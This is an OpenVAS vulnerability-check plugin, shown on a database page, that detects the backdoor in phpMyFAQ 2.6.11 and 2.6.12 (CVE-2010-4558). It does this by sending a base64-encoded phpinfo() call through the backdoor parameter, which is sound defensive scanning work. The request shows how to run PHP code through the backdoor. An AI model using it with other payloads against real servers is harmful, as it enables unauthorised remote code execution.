Lucene search

K
openvasCopyright (C) 2010 Greenbone AGOPENVAS:1361412562310100948
HistoryDec 20, 2010 - 12:00 a.m.

phpMyFAQ Backdoor Unauthorized Access Vulnerability

2010-12-2000:00:00
Copyright (C) 2010 Greenbone AG
plugins.openvas.org
41

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

Low

0.013 Low

EPSS

Percentile

85.7%

phpMyFAQ is prone to an unauthorized-access vulnerability due to a backdoor
in certain versions of the application.

# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = 'cpe:/a:phpmyfaq:phpmyfaq';

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.100948");
  script_version("2023-07-28T16:09:07+0000");
  script_tag(name:"last_modification", value:"2023-07-28 16:09:07 +0000 (Fri, 28 Jul 2023)");
  script_tag(name:"creation_date", value:"2010-12-20 20:02:52 +0100 (Mon, 20 Dec 2010)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_cve_id("CVE-2010-4558");

  script_name("phpMyFAQ Backdoor Unauthorized Access Vulnerability");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/45442");
  script_xref(name:"URL", value:"http://www.phpmyfaq.de/");
  script_xref(name:"URL", value:"http://www.phpmyfaq.de/advisory_2010-12-15.php");

  script_tag(name:"qod_type", value:"remote_vul");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2010 Greenbone AG");
  script_dependencies("phpmyfaq_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("phpmyfaq/installed");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"solution", value:"Updates are available. Please see the references for more information.");

  script_tag(name:"summary", value:"phpMyFAQ is prone to an unauthorized-access vulnerability due to a backdoor
  in certain versions of the application.");

  script_tag(name:"impact", value:"Successful exploits allow remote attackers to execute arbitrary PHP code in
  the context of the affected application.");

  script_tag(name:"affected", value:"phpMyFAQ 2.6.11 and 2.6.12 obtained between December 4, 1010, and December 15, 2010
  are vulnerable.");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!port = get_app_port(cpe: CPE))
  exit(0);

if (!dir = get_app_location(cpe: CPE, port: port))
  exit(0);

if (dir == "/")
  dir = "";

url = dir +  "/index.php?phpmyfaq_new=cGhwaW5mbygpOwo=";

if (http_vuln_check(port: port, url: url, pattern: "<title>phpinfo", extra_check: make_list("PHP Core"))) {
  report = http_report_vuln_url(port: port, url: url);
  security_message(port: port, data: report);
  exit(0);
}

exit(0);

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

Low

0.013 Low

EPSS

Percentile

85.7%

Related for OPENVAS:1361412562310100948